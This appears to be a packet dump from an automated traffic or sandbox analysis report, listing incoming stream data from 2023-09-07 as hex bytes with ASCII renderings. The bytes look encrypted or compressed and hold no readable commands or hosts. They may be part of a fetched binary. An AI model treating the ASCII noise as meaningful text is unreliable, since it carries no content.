2023-09-07 07:31:07 UTC	43	IN	Data Raw: 87 96 9a 5d d4 a1 d4 82 05 27 65 0a 1a e2 d4 da dd c8 ac 92 c4 21 42 9d d8 69 49 fa 49 a3 34 b9 44 73 2b 68 69 49 e1 23 c5 77 47 e5 5e 55 65 8a 20 83 95 73 20 92 59 4a 61 eb 5b 0b 40 1c 93 95 b2 4d 41 23 6d f0 c1 61 84 54 74 d5 4f 79 f6 7f 03 fc 08 46 f5 bb 18 40 29 54 64 f8 c5 6a fc 1e 7c 7e 5c ee 08 88 dd 3e 9f 9d 03 58 db 12 e3 24 b6 6d 8c 29 e4 6e db 7e 1c 57 f4 94 8e af 8e 20 1d 2e eb 45 46 f0 80 e5 67 e9 1c 56 f5 b8 8b 44 41 99 0c dd 14 fd 8f cd 6c f2 90 f6 eb 59 61 2d ea 6d 11 52 ee fc 40 72 1e 37 29 45 ef f4 f0 31 d9 d9 cb 8d bd 09 bd e3 6b 04 4e 2d a2 c4 62 e1 68 8e 08 65 d9 3c c6 a4 dc c0 8e 56 f3 f5 b7 2a ec c4 3a 22 8a 89 d5 c1 da ae 60 ed fd 4b 92 1a 6a ba 62 b6 5a 87 86 22 5a 9b 41 15 fb 4d 00 ae 77 4c 96 49 75 44 fc 00 03 fe f7 1b 00 64 c1 Data Ascii: ]'e!BiII4Ds+hiI#wG^Ue s YJa[@MA#maTtOyF@)Tdj\|~\>X$m)n~W .EFgVDAlYa-mR@r7)E1kN-bhe<V*:"`KjbZ"ZAMwLIuDd
2023-09-07 07:31:07 UTC	45	IN	Data Raw: 40 a3 f9 ed 62 a5 9a 4a 24 89 a6 a8 94 99 3a 0d f9 af fe fd 3e 5d e5 d1 2b c1 e0 d3 17 97 62 f7 af ae bf ae d7 2b aa 00 ca ec fb 3e 61 4c 84 00 71 23 e0 47 84 40 1d c8 34 06 8c 87 eb a3 16 5f ef ff 5c ef c7 c8 45 56 20 1a 7c 32 b3 53 0a 9c 3e 3d c8 e7 9e 8a 6e 2b da 84 92 29 5d 60 81 b8 7d d9 40 c8 98 63 8b e8 2a 60 7a 6e 8d b5 b4 40 ae 17 a6 ca 4f 10 c7 61 8c ee 60 4c 03 73 3c ad 29 d3 90 ae 02 f1 4a ac d5 44 66 8c 35 7d 88 81 43 6c fc 51 20 99 c3 57 0d 71 fe 4b 37 0c 1a 71 14 79 be 44 f0 68 89 09 87 6c d4 d9 9d 70 7b 3c ce 5c 03 d5 a4 f2 d7 32 b1 57 9b 3d 8e b9 40 4b 98 23 fb 30 6f b0 fe aa 19 d8 c0 0b 59 2b 48 7e 37 cd a6 6b d4 92 d6 18 94 46 cf 89 9b 73 18 5d 93 de 91 a0 37 40 f3 e6 d3 7e 5e f5 9f d8 3c 8e 06 41 b0 73 7c e3 93 ec 5d 5d 4a 36 a7 b5 a8 Data Ascii: @bJ$:>]+b+>aLq#G@4_\EV \|2S>=n+)]`}@c*`zn@Oa`Ls<)JDf5}ClQ WqK7qyDhlp{<\2W=@K#0oY+H~7kFs]7@~^<As\|]]J6
2023-09-07 07:31:07 UTC	46	IN	Data Raw: 5e a7 4b e8 38 a0 a6 f2 a6 d7 e5 83 e0 f1 26 68 12 e7 11 19 49 5c a3 19 f1 fb 22 02 73 9f fe 1e 1f 42 b5 1a 27 e4 1c b3 9c e8 fd ab e3 37 0d 9d 24 07 ca 0c 11 95 e9 27 5f b1 aa c9 b7 36 4a 32 a4 e7 56 a9 1e 4a 63 8c e3 d6 7f 2b b9 c9 5c fa e8 39 66 31 e0 36 19 04 a2 6f 46 91 4b 1c 13 4d e3 ca f3 e8 ff c5 05 19 aa b2 17 10 3d 0f 37 d1 cd e1 2e ed f0 ab 3f d4 76 e7 35 fd 7a 13 e0 cd 4e 87 c2 9f 9a c2 6a bd b8 99 0a fb f8 2e 92 2b e1 ce 4d 89 66 09 f6 f9 5d f3 67 33 39 3e 0b 45 1c 94 00 bb 9e f3 58 40 76 f9 63 71 3a fa eb 0c ba 51 95 14 7e 26 fe c6 9d 2f 92 16 89 0a 7e ad 80 32 58 98 97 46 4c 92 c8 19 3b 83 61 b0 c3 cc b5 82 2e 3d b4 5b 95 23 0d 2a 77 b6 f4 cd b4 3a 67 6f dc da f5 cd e5 a5 87 52 c1 10 60 a6 62 6f 6b fd 64 84 6f 6d c7 a2 7b 01 25 eb 12 2b 16 Data Ascii: ^K8&hI\"sB'7$'_6J2VJc+\9f16oFKM=7.?v5zNj.+Mf]g39>EX@vcq:Q~&/~2XFL;a.=[#*w:goR`bokdom{%+
2023-09-07 07:31:07 UTC	47	IN	Data Raw: bd 67 5d cd 6b 01 8b dd e1 2c f1 6f c0 a1 51 af f2 2e c0 70 72 ce 1a 16 f3 35 d7 ce b1 e0 d7 c7 8b 38 b5 ad 4d 4e e4 75 87 e7 58 0c 8b 4e ac e8 1d 06 7e b3 36 56 73 56 a0 b9 f5 2c 45 62 f8 1f 81 03 23 71 23 01 a5 bc bc 3c 38 89 b6 58 e5 a5 90 7e 31 01 45 92 0b c6 1e da d7 4e 36 63 ca 60 96 41 7e 03 d6 3e bc fa 8b 3f e8 e2 31 37 a4 da 5b f9 0b 3c 6e fd 38 66 ae d1 dc 39 54 93 d6 08 e1 85 08 68 84 22 32 20 4d 2d af da e6 61 93 c4 30 1e 0f 13 88 ab f4 b3 1c 85 b4 be cf 08 76 81 61 64 6c 06 f7 85 2e a9 04 19 19 cb 2a 99 30 80 91 09 01 47 8a c6 19 3c 75 fc 5c 08 69 86 59 3b 8f dd 0f 90 b1 4d 0b 21 ea ed db 22 4e a7 6a 67 f5 9a 10 b9 df 83 31 7f 0d 08 8c 21 54 f3 fe 7c 5c 91 6a 3c b2 77 46 78 2d 42 65 42 2e 4e be 78 d8 94 fa 3c e9 f6 c7 8a 51 45 95 1d 2b 1b 31 Data Ascii: g]k,oQ.pr58MNuXN~6VsV,Eb#q#<8X~1EN6c`A~>?17[<n8f9Th"2 M-a0vadl.*0G<u\iY;M!"Njg1!T\|\j<wFx-BeB.Nx<QE+1
2023-09-07 07:31:07 UTC	48	IN	Data Raw: 87 86 f5 03 9b 41 1f 1a 4d 00 ae 4c 4d 96 49 76 44 fc 13 02 fe f7 fb 03 64 c1 3a 90 7b 0b 05 25 f0 59 1c 78 2e 7d f6 27 63 0b ce 8d 18 de 95 97 d2 88 84 2e 2e e9 25 5b da 63 e9 60 1b e8 81 fa 88 f4 44 90 c3 2b ad 3f 5c 65 d2 1d 55 51 e7 df 91 5b cc 58 cd 6f c3 ef 5d da ae 62 a7 65 4a ef 62 ce d1 e7 4a a2 ff 6c f7 b4 3a 47 32 c4 b2 fd 74 5b ed f7 14 f4 ec ec df 00 b2 47 42 ab 0e 16 41 d3 8e 1e 05 a2 e9 f6 df 7f 44 fa ab 12 b2 16 83 1d 07 bb 9a 8e da 97 e7 32 b4 4c 40 0f ec fc 69 5c eb 78 09 49 8e 23 a5 60 47 31 ab e7 33 9a 06 37 69 87 4d 4d 51 72 4e e1 16 f5 cc 45 25 0e 52 17 d6 ab 28 81 73 2e be 9e 7f 87 dc b3 8e 17 96 4d a4 4d bb e1 c8 c0 a8 dd 64 85 3e 14 07 6d fc d7 9c e5 01 7d 78 0c f9 18 0b a2 31 f8 c0 24 37 d4 47 a9 47 14 08 26 e1 ee 18 d9 93 b9 bc Data Ascii: AMLMIvDd:{%Yx.}'c..%[c`D+?\eUQ[Xo]beJbJl:G2t[GBAD2L@i\xI#`G137iMMQrNE%R(s.MMd>m}x1$7GG&
2023-09-07 07:31:07 UTC	49	IN	Data Raw: 5d 8c d2 75 53 47 d5 a1 83 14 2a 2e 29 ad 78 69 df af fd 49 48 6f da b7 8a 94 bd 07 a8 6b 99 9f 25 9e c4 a2 6d 80 2d e2 5f df 6a 1b c6 13 f9 74 cf 98 2f 6e 10 50 04 52 24 37 c7 50 ea 37 a3 03 40 01 0a f8 49 78 a9 9e 61 7c 54 d1 39 8a c1 1e eb 8f 0f d6 a6 37 ad b3 89 f5 33 ac 4a e1 c6 1a 72 bb a9 eb 97 cf 1f 6c 08 71 8d 71 Data Ascii: ]uSG*.)xiIHok%m-_jt/nPR$7P7@Ixa\|T973Jrlqq
2023-09-07 07:31:07 UTC	50	IN	Data Raw: 17 11 30 b3 97 b0 ff a4 e9 a0 de 56 1a 12 af 0a 1a e3 df 7c cf f1 91 80 f5 f0 bb bc 7f be d4 e9 47 b2 4c 7a 8d 88 7f 51 01 5c b8 1b c1 7e 7f f0 da 77 0e a4 26 8c 89 5b 21 92 59 f9 4d c3 4c 59 4e 26 96 bc b2 71 d0 45 ac a0 11 85 05 c2 77 f3 9b 7e f8 3a 27 ee 22 4c 8b ae 01 be 22 17 d5 8b 41 60 f1 0b 66 74 5b c4 19 8d e8 24 9f 9d 03 5f 85 60 2d ce e6 42 e6 44 da 69 fb 1a bc 82 af bc e6 c2 36 26 35 05 e7 5a 42 fb 87 cf 76 ec 21 be 0a 95 ae 33 c5 8e 1f fd 1e f4 b6 c3 92 e2 a8 eb cc a2 58 bd 18 aa 19 42 c9 d6 5f 3e 69 23 29 54 fb ed 0e 80 f7 f5 cc b4 57 cf 57 70 41 66 4c 2b a4 e4 65 26 82 d4 21 07 db 3c c0 0b f6 06 64 2f d9 97 b5 98 e9 b7 06 20 8a 83 ba fd db ae 6b f5 ee 5f 92 5a 7e a0 9c 31 75 ab 81 d5 62 5d ab 45 d3 2f 02 ae 71 6c de 8f 9f 1e d4 71 01 fe f1 Data Ascii: 0V\|GLzQ\~w&[!YMLYN&qEw~:'"L"A`ft[$_`-BDi6&5ZBv!3XB_>i#)TWWpAfL+e&!<d/ k_Z~1ub]E/qlq
2023-09-07 07:31:07 UTC	51	IN	Data Raw: 34 bd d3 11 64 df d6 fd 42 00 3e 9f 7f a1 ce 82 58 9f 55 2d eb a4 e5 da 7e 5d e7 dd 30 a1 22 c5 06 85 5e cc af a8 3d e5 c8 2c 8d 33 d1 90 ad 51 19 47 bd b0 60 2d f1 40 19 dd 00 e8 2f 3b b1 c7 c3 c1 1e 30 90 91 2a e9 d6 d4 4a 83 24 0c 6d 3d b1 56 8a 90 08 13 cc 6b 81 88 6f a5 cf 66 b1 f6 25 55 8e a9 61 d9 59 e1 c5 0d 9d e8 3b 65 5c 37 bd b9 a5 5c a8 31 f4 a4 a0 10 d6 7a bf 5f ba ab 71 a8 5f af 2f c6 f1 95 0d d9 65 80 c3 53 64 a3 e8 b9 4a b8 6b 0e f4 7c 72 f0 9a 22 0c 7b c1 41 26 1d 0a 71 08 77 be 73 dd 7e 98 11 c5 29 c4 cd 8f 47 1f 2a ee 6e 26 d0 10 d5 da 74 b0 51 82 4a de a1 51 55 98 3d ca 3c c2 29 4c 82 7b db e8 e8 36 56 43 6d 29 cd a1 5c 97 bd d4 ac b2 35 da 18 82 3c 50 55 82 d6 91 a7 c9 c9 8c d4 0c 7e 54 c2 f3 ff 3b 3a 3c 32 a3 fd 13 f4 8b 13 a2 a8 77 Data Ascii: 4dB>XU-~]0"^=,3QG`-@/;0J$m=Vkof%UaY;e\7\1z_q_/eSdJk\|r"{A&qws~)Gn&tQJQU=<)L{6VCm)\5<PU~T;:<2w
2023-09-07 07:31:07 UTC	52	IN	Data Raw: 43 06 7b b1 95 4d 11 7e 5a a2 a6 b2 8e d1 e5 87 eb fd 3a 78 19 e7 00 13 53 a2 a3 37 eb f3 02 b3 b8 75 a4 69 7d 40 b5 0e 0e e2 1c bd 96 c0 fa ab e3 3d 21 b6 3f 14 c1 9b 00 9e f1 4e 5e 9d a3 94 32 36 4a 36 af fe 45 a2 1e 5b 68 90 1d d7 53 3d 92 8b 41 c2 e2 39 77 04 fc c8 18 2b ab 1c c2 90 4b 16 38 48 c0 c4 f3 aa f5 dc fb 43 86 b9 19 1c 06 33 0f 92 c6 ed 34 fe ea a1 39 21 61 35 3d a2 fa 13 f7 d4 4f 9f c0 9e 84 2d 61 89 44 b3 36 d2 b6 d1 6d cb f5 ce ca 89 66 09 db b2 8d 1d 2b 08 5e 04 86 43 34 88 09 aa 91 69 65 16 4c f9 63 72 06 f7 fa 47 23 a1 e6 1c 6f 23 e1 be 7e c1 16 45 b0 6d 65 f5 17 04 77 fd 9e 5d 45 85 ef 46 aa ab 47 9c cb c0 b5 8e ed 54 ab 5b 95 3d 0e a1 79 b2 e3 95 86 b2 94 71 dc de dc 42 e2 ac 9c 5a d3 60 c0 a0 74 74 64 5b 21 ad 44 6a d4 ac 01 99 21 Data Ascii: C{M~Z:xS7ui}@=!?N^26J6E[hS=A9w+K8HC349!a5=O-aD6mf+^C4ieLcrG#o#~Emew]EFGT[=yqBZ`ttd[!Dj!
2023-09-07 07:31:07 UTC	53	IN	Data Raw: 9c 5b 68 26 ac 6a 57 14 9b eb d1 f7 83 7f f1 1f 2f a7 5b af f8 25 d9 63 7a 87 0b 94 37 cb d5 e3 b8 93 52 c5 8b 1a bf 74 b7 46 ee 64 8f f1 a6 0d a7 59 ac 1d fb 0e 7d a3 3e 4d 8c 44 bc be de 23 6d ef ff 32 0a 02 32 61 3c 04 f2 85 be 3c 32 e6 62 55 fa b7 7d 79 25 02 55 94 64 87 19 f2 1b 5d 3e 76 de 00 ef 40 6f 08 da 20 4a f2 c8 d3 f9 eb 2a 5d a4 4f 44 89 3d 3a 69 ec 34 1a bf e9 6a 33 43 ca ab eb c9 9d 03 31 5f bd 20 31 48 0c 7d fb 0c 3b b1 b5 3b 01 12 28 c4 ab e5 b4 2f 81 5b bb eb 27 08 4f 70 61 77 1d 66 fb ec f0 15 1b 67 b8 3c c0 a5 e1 0e 73 58 96 17 d4 39 31 b0 3e e3 20 0b 8e 4a 34 b8 83 1c 9d bb 71 15 2c 11 cc e9 f2 a6 92 54 05 f7 90 0c ca 89 db bc 54 21 3a 85 3b 3e 29 ed 71 56 91 62 4c 75 89 47 5e 0c 19 5b 43 24 63 e4 79 cf 91 f3 42 23 e9 d3 7e 41 6c f2 Data Ascii: [h&jW/[%cz7RtFdY}>MD#m22a<<2bU}y%Ud]>v@o J*]OD=:i4j3C1_ 1H};;(/['Opawfg<sX91> J4q,TT!:;>)qVbLuG^[C$cyB#~Al
2023-09-07 07:31:07 UTC	54	IN	Data Raw: 96 60 1b 5c bf 20 0b a6 64 50 16 d1 4d 00 ae 36 50 96 49 75 44 fc 13 27 fe f7 fa 18 65 c1 3a 9e 7a 0b 05 02 f1 59 1c 2c 2f 7d f7 70 61 23 ca 8c 18 d4 96 ac d6 51 6e 9b 06 8b 27 0d dc 4b b0 77 08 e9 80 d4 8a 9e f3 88 3d 2e ab 18 4a 6d b6 be 52 51 f2 f2 86 a5 cd 6f f8 7f c9 a8 4f dd ae 13 a0 73 a5 f8 5d cc e9 99 59 a5 ff 7d e1 ab de b8 1f ea 9c f9 75 8e fd d9 ec e5 ea ff 01 10 5b a6 1f ab 6b 14 41 df cc e7 1f b1 e5 85 12 79 53 0e a6 3c 93 ff 07 1d 0d c2 a4 97 c9 9b ea 50 64 54 be 04 ca e0 7e 40 ac 7b 08 49 8e 1d ba d2 73 6b 83 8f 5e 63 00 1f 65 81 44 6f 41 6a 5d e1 79 1f ca 53 d1 09 78 7c e0 bd 3b 8d 75 50 8f 84 81 8c 9f 68 a5 15 b7 cb d3 ce ab e5 d8 bf 98 db 4c 3e 2d 11 1c 7e a7 46 9c e5 0d 01 f3 1c ff 71 ab cd f5 f2 cb f0 54 00 41 85 4a 16 0b 71 51 ee 18 Data Ascii: `\ dPM6PIuD'e:zY,/}pa#Qn'Kw=.JmRQoOs]Y}u[kAyS<PdT~@{Isk^ceDoAj]ySx\|;uPhL>-~FqTAJqQ
2023-09-07 07:31:07 UTC	56	IN	Data Raw: c8 7e b6 8a 51 ac eb d8 85 1c fd c9 ee 29 2d 25 3a a1 61 7a da bd f5 a3 56 4a 34 a4 a4 99 bb 27 24 2b 1d ed 61 fc c6 a8 71 b3 93 22 a4 97 54 87 c5 3f fb 54 14 4b d7 34 29 20 1c ac 23 68 f9 7a e8 16 65 40 09 01 00 ed 44 04 05 9e 70 62 42 26 57 1f ed 19 c1 87 a1 05 90 1e cf b1 80 9c aa 3f 8d 01 8f 22 06 aa b8 d5 e6 7d d8 86 43 49 fe 62 8d 04 47 86 87 b4 9a 73 d4 a1 d4 7a 12 12 be 02 0c e6 c7 aa c8 dd bd 8d c3 13 65 56 27 96 a4 ee 6f e2 6d aa 4c 44 05 78 62 5e b8 90 fe 8a b8 1b 93 59 4c a7 27 8a fa ea 3f 92 53 97 63 c5 5a 40 5b 23 91 b5 b2 60 ef 2e 8c 4b 67 b6 19 88 77 f5 87 6b f8 44 1f fd 2b 6e bc 90 00 b8 0e 69 68 ab 29 b4 16 4e 5e 05 4d c4 0e 8f e5 21 70 9b 3d 4d d3 78 2d ce ea 63 9d 5f e5 68 fd 03 d9 ac a4 ad e8 c2 f3 27 35 09 fc 56 47 fe 80 c3 4c eb 27 Data Ascii: ~Q)-%:azVJ4'$+aq"T?TK4) #hze@DpbB&W?"}CIbGszeV'omLDxb^YL'?ScZ@[#`.KgwkD+nih)N^M!p=Mx-c_h'5VGL'
2023-09-07 07:31:07 UTC	57	IN	Data Raw: 6f d1 24 f5 f2 f4 a5 b6 7b 04 a2 2b 88 16 7c 6d 75 25 b0 44 6c cd bb 76 0f 2e e7 16 73 16 c0 84 fa 62 ba 5d ee 86 7a 84 6c 52 a6 35 8d e2 6a ae 56 09 f9 eb e0 2f 4d 23 0d 7d cf b4 38 c7 b1 69 45 91 73 78 2b 9c 1c 30 f9 27 a2 c4 a6 1a 46 f0 1b 9c ea a0 0c cd dd f1 ce 03 8b 25 cb c2 a0 fb bc 3b a5 85 ad 05 6f 2e 3a 5b 54 4f 1d 84 11 19 3f 80 d0 1f 77 98 de fc 42 00 5b b8 6d b5 c4 bb 80 82 ab 26 d4 a6 87 7d 6d 4c fb c2 3c 8a e7 c5 17 91 50 ce 40 bb 8b ff fc 17 80 22 db e0 ca 42 0d 4d 95 12 79 d3 f0 7d 02 dd 07 de 32 27 56 bd 01 f9 34 52 94 fe 5a c1 ca de 52 04 91 16 7e 28 a2 54 8f 9b e0 0d ed fd 89 16 71 ba c5 fa b3 e8 53 60 9a a9 7a de 4b e4 36 63 a7 e3 2a 7f 52 36 16 a6 b3 4e ab 3d f0 cb 5e 04 c9 7b 52 53 87 ac 48 55 4f a0 b3 d8 e0 88 10 e5 40 90 d7 4a 7b Data Ascii: o${+\|mu%Dlv.sb]zlR5jV/M#}8iEsx+0'F%;o.:[TO?wB[m&}mL<P@"BMy}2'V4RZR~(TqS`zK6c*R6N=^{RSHUO@J{
2023-09-07 07:31:07 UTC	58	IN	Data Raw: 80 6f 53 3b 43 46 72 05 21 65 42 ba 63 fb 69 d5 9c f3 53 89 f6 c7 80 46 40 fa d5 2a 1b 3b 09 a8 c9 ad 13 9b f3 1a 16 53 e7 55 a1 49 27 ca d5 db a5 95 2a 06 a0 19 f6 59 ea c4 55 ff c6 d9 b7 3a 50 0b 5d 3f 5b 27 97 5e 34 57 fe 0b 2d 84 55 95 7e 44 1d 97 f6 91 85 fb 70 e8 e0 e2 d6 88 2f 5e 31 40 d6 72 4d 75 44 f6 5b 53 ae 74 04 ee 26 f1 26 06 71 b7 bd 45 11 c0 50 8a fb f5 8e db e9 8b 85 a6 3b 7b 13 f4 06 39 64 b3 a4 5a 00 f3 02 0a cc 24 a4 36 7c 4d bc 73 51 e3 1c b9 ba e2 f3 c4 23 3d 21 be 28 7b 00 0c 00 94 9e 1b 5e 9d a9 92 a9 36 4a 32 a4 20 4c 84 0a 48 6d 4d de d7 53 2e 83 8d 2e 07 e3 39 7d 17 3d 16 0d 39 ad 69 cc 91 4b 17 2a 54 e1 c6 df fe e5 db 94 0c 86 b9 02 d6 12 2d c9 d0 d1 13 35 f9 75 c2 35 21 62 46 18 fe 79 9d 9e c2 1c 90 8b 19 9b 3c 6b 90 a9 b6 08 Data Ascii: oS;CFr!eBciSF@;SUI'YU:P]?['^4W-U~Dp/^1@rMuD[St&&qEP;{9dZ$6\|MsQ#=!({^6J2 LHmMS..9}=9iK*T-5u5!bFy<k
2023-09-07 07:31:07 UTC	59	IN	Data Raw: 87 b5 ce 0a 6e 74 19 71 1e ae 89 39 fa c2 ec a7 cc 56 dd 4d 0c 11 5a c4 1d 1f db 4b 4f 4a c5 98 1d ea c8 01 01 ba 00 d6 bb 94 de 00 a3 c6 55 a8 d9 ab 70 be c5 66 7b 2d e9 d4 a7 74 56 3f 92 d4 48 fd bc db 1f 48 e9 78 f8 d4 d2 84 b3 72 4b 0c 12 67 78 03 30 7a e7 e5 86 ad 8a 85 17 7d ce c3 6c 46 38 d9 a4 29 fe 45 80 ee 53 d8 a0 b2 4a 83 55 bb bf f2 bc 6d 77 10 be e2 c0 fd ab 97 f0 69 ee b4 5b 71 fe 03 cd 70 70 10 0b 0f ee e1 d6 e3 a8 93 53 c7 8b 2f bf 18 94 46 e2 65 8f f1 a7 16 97 4f ac 6f 0e 0e 7e ce 3e 4d 9c 41 9f bd f5 38 6e fe f9 7a f4 03 0f 73 2f 1e d9 7e bc 2d 34 f1 8d 59 c9 ad a8 7a 22 e7 46 91 23 2e 19 f2 17 66 93 68 c7 15 e8 5f 5e 88 da 3a b4 f2 ef 8b b7 e3 3b 52 be d3 5d f7 73 58 d4 fc 32 73 b6 c9 42 85 55 93 c2 04 17 97 01 44 88 39 58 25 48 0d 5f Data Ascii: ntq9VMZKOJUpf{-tV?HHxrKgx0z}lF8)ESJUmwi[qppS/FeOo~>MA8nzs/~-4Yz"F#.fh_^:;R]sX2sBUD9X%H_
2023-09-07 07:31:07 UTC	61	IN	Data Raw: 45 e8 03 e2 68 fb 1a a0 29 af bc ea be 9d 37 26 60 78 44 4c ee fc af 66 f8 3c 53 17 81 30 40 41 8e 0d eb 3c 8d a4 d7 98 e0 a8 e6 d4 74 3b 90 11 98 ce 23 10 3c 1a 1b 18 35 29 43 c7 c8 f0 81 d1 cb df bc df 08 bd 20 49 79 97 c1 f8 ec 00 e2 68 88 21 59 d9 3c cc 74 cf d4 a6 17 f0 f5 bd b8 61 1e d0 7b a2 eb d7 c0 dc 86 5d ef fd 41 cd 67 63 a8 76 18 3a 86 86 ff 4a 8a 53 0b d3 2f 01 ae 7d 6c 0e 93 9f 1e d4 71 01 fe f1 d2 42 64 c1 30 8d 5c 19 11 29 92 58 1c 27 0f c8 2c c4 39 23 ac 8e 18 d8 b4 c7 c7 99 21 e9 4c eb 25 0b b5 15 f8 76 02 c7 59 cb 88 e3 50 9a 2f 36 a9 5e 49 6e c1 34 0f ae 09 27 58 ab df 68 36 6d eb f7 4e c6 c1 67 a0 73 be 32 3d 61 d0 f0 5f b6 ea 6c e5 bc d5 66 a2 1c 73 a5 77 f7 ec df ea d4 a8 c3 ea b4 5f cf 1a 83 6a 7b 37 d5 e1 a3 2d 51 e2 85 05 10 ee Data Ascii: Eh)7&`xDLf<S0@A<t;#<5)C Iyh!Y<ta{]Agcv:JS/}lqBd0\)X',9#!L%vYP/6^In4'Xh6mNgs2=a_lfsw_j{7-Q
2023-09-07 07:31:07 UTC	62	IN	Data Raw: 0e 90 11 a5 4a fe 12 ae 52 ad 86 d5 7e 4b 0a 01 b7 fd 84 05 d9 26 80 c3 5f 64 bf e6 90 71 cc 6b 1f e9 4e 2b 08 e8 7a 06 08 6c 53 36 0a 09 66 1f 68 a4 0b e3 6e 8f 04 b9 94 c4 e1 95 39 60 03 8d 68 37 ca 3b b6 b4 30 b1 4e 9c 36 b2 a0 40 44 96 07 14 26 d2 33 f8 bc 08 cc 66 87 66 5c 42 6d 2f c3 9a 6f 9b 81 d0 1e 85 7f 26 19 a8 47 38 53 93 d5 ef 56 a6 5f 86 c3 5f 51 53 2a 54 13 36 02 3d 34 b2 62 6d d4 8d 12 5c 7b 7c 35 be 86 d8 60 cd 7e 83 11 c7 0d fa a9 6b 6b a0 8b 1b eb 7a bd 86 db 30 ec 43 03 49 d2 2b 19 cc 07 7e 32 55 ea 59 fb 2d e4 86 40 01 06 f4 51 74 9f 8d 67 68 5e 38 27 82 13 18 e7 00 f0 9d fe 1f cf ae ac e0 04 3f 9c 1c 87 cc 11 95 a0 fc a2 6d ce 1c 59 45 fc 64 17 06 54 96 68 b1 d9 cd c2 b2 c8 46 15 16 bb 1b 1c e8 d6 7c cf f1 b6 96 df 0a ca 56 25 96 a9 Data Ascii: JR~K&_dqkN+zlS6fhn9`h7;0N6@D&3ff\Bm/o&G8SV__QS*T6=4bm\{\|5`~kkz0CI+~2UY-@Qtgh^8'?mYEdThF\|V%
2023-09-07 07:31:07 UTC	63	IN	Data Raw: ed 34 ef ff ba 28 ff ac c2 de 8b 56 71 f5 de 43 e8 4c 95 84 3a 78 96 ab b6 1e c5 97 0d b6 3e b3 ce 9e 8b 66 05 94 70 4f f7 77 33 34 17 82 54 1a b4 fa 71 71 38 4a 5c 74 f9 65 17 b4 fe fc 52 38 75 f2 1a 47 40 e6 9e 06 38 36 1e 98 0f 76 fd 39 4f 6b fd 94 6d f7 8c c7 41 bb a2 74 06 c2 c6 a6 97 35 a1 a3 73 0f 22 1e 26 09 18 e2 94 a5 71 e0 61 d6 b5 44 df e2 aa 80 38 38 48 71 aa 1b ce 6c 73 0b bb 2b 8f c7 a8 78 7f 90 f5 02 75 10 bb 78 eb 9c b1 1e 54 96 7f 91 6f 46 a5 2c f6 52 7a ba 4a e1 97 24 f7 3e 4a 5b bb 5c cc 6d ca f2 7a 0b 47 9b 1a e2 36 9c 1a 29 57 2d bd d9 b7 00 7a 53 e4 9d c0 a4 10 d1 c0 e6 e7 35 ce cf 91 e0 ad 53 bd 3d 8b 8a a3 14 6b e3 96 49 40 49 1a ff e5 e7 3e a6 b4 b0 6c b0 ee eb 2d e9 51 a0 74 ce 74 ab 94 99 42 48 1b af f4 db 02 fe f0 ce 24 8a fc Data Ascii: 4(VqCL:x>fpOw34Tqq8J\teR8uG@86v9OkmAt5s"&qaD88Hqls+xuxToF,RzJ$>J[\mzG6)W-zS5S=kI@I>l-QttBH$
2023-09-07 07:31:07 UTC	64	IN	Data Raw: f8 62 32 6d d5 4a 74 a9 ef c8 25 5f 93 c3 11 37 9c 25 78 88 2d 17 b6 9c e7 0f 36 6e 39 bb a0 90 01 00 30 c9 ac e9 47 31 b3 ae bc dc 03 31 3c 60 64 60 b5 ec e1 e6 ae 12 ed 77 9e 28 99 21 b3 11 0e 1e 4d 65 c2 15 33 9a 13 3e 14 f4 7b a6 3b 8f 90 0f 90 b1 4a 18 30 fc fd c6 e6 04 fc 42 05 f3 9a 16 80 88 88 09 f8 20 3a 84 28 3c 2e 00 7d 7a 8d 6d 2d 7e 76 46 78 2d 5a 64 42 22 78 f0 69 db 83 e1 ad 2f da d7 86 5e 60 17 01 c1 41 13 6a aa c9 ab b1 52 e0 11 16 10 ff ab a0 7f 2f c8 fd a2 a4 95 2c 2a fd 03 fc 42 dd dd 44 42 c6 f5 bb 54 4d 09 64 5f 49 2f a9 cf 2a 45 f5 0b 3b 93 46 95 7e 44 13 9c d5 07 9f f3 70 f8 e2 e6 22 82 16 98 2f be d7 7e 4e af d0 a8 72 31 a6 5c 7f f1 55 ab 38 0f 70 b1 92 52 1d 3e 5b 8e b6 f2 96 f1 47 57 00 a7 12 19 1b e7 06 b0 4c af a9 35 ec e8 fc Data Ascii: b2mJt%_7%x-6n90G11<`d`w(!Me3>{;J0B :(<.}zm-~vFx-ZdB"xi/^`AjR/,BDBTMd_I/E;F~Dp"/~Nr1\U8pR>[GWL5
2023-09-07 07:31:07 UTC	65	IN	Data Raw: bd 8c dd ec f2 c4 c7 ff 11 7d de 68 82 6c 1e 2e a4 e0 a9 0f bd f6 8f 03 79 5b ea 59 11 b6 b3 fd a1 0d c8 aa af 8d 4f 00 1b 4a 2e 42 05 e0 84 db 5a 84 49 28 10 56 d7 a4 27 fb 33 ab eb 74 7f 06 37 69 a1 3e b7 a0 29 66 85 7b 0e ca 6d 0e 08 54 72 93 da 29 8b 7f 2e f8 9e 7f 87 ac 71 84 17 9a Data Ascii: }hl.y[YOJ.BZI(V'3t7i>)f{mTr).q
2023-09-07 07:31:08 UTC	66	IN	Data Raw: 41 aa ba ab c9 e1 cd 2c dc 64 8b 0d 66 c0 82 d5 c6 ff e7 0b 68 00 a7 ff 77 a7 82 4b 24 21 a0 13 a7 43 85 46 2d 12 49 f5 e4 38 7e 98 8d ea ec fa 19 c2 68 28 20 bc 13 d8 cf ec f7 a6 a8 a9 22 ba dc a6 7e b0 cb 4e 87 33 e6 2c 8e fe 68 41 28 c7 4e e8 98 59 c9 8a 49 51 9a d0 c1 85 d3 45 54 0c 16 46 c5 db c5 38 42 98 84 ad 8d be 02 6c c9 df 5d 80 fe 2c e6 29 b7 46 80 e2 6a fe bf 92 51 f8 33 a4 97 d3 d2 1c 7c 15 a5 f4 c1 ff 83 28 ee 72 16 a6 7d 90 86 99 d9 63 7e ee 85 cd 0e 91 fe 80 ba 93 55 b9 31 32 bf b1 7e d6 37 8e d5 d9 c4 0f a7 4c 84 e3 0e 0e 74 82 8f 9e 67 0d a4 d9 dc 2e 68 c7 de 6c 0a 08 50 07 2e 09 c0 17 cd 3d 32 ec 6c 44 ef af 85 63 f7 0e 68 ac 75 68 18 f2 15 6e 6a bc 2d 49 ca 22 7c 05 c3 44 0e f3 e4 fc c8 8d ee b2 e8 f3 39 f1 64 2d 47 e1 32 75 a3 c9 e8 Data Ascii: A,dfhwK$!CF-I8~h( "~N3,hA(NYIQETF8Bl],)FjQ3\|(r}c~U12~7Ltg.hlP.=2lDchuhnj-I"\|D9d-G2u
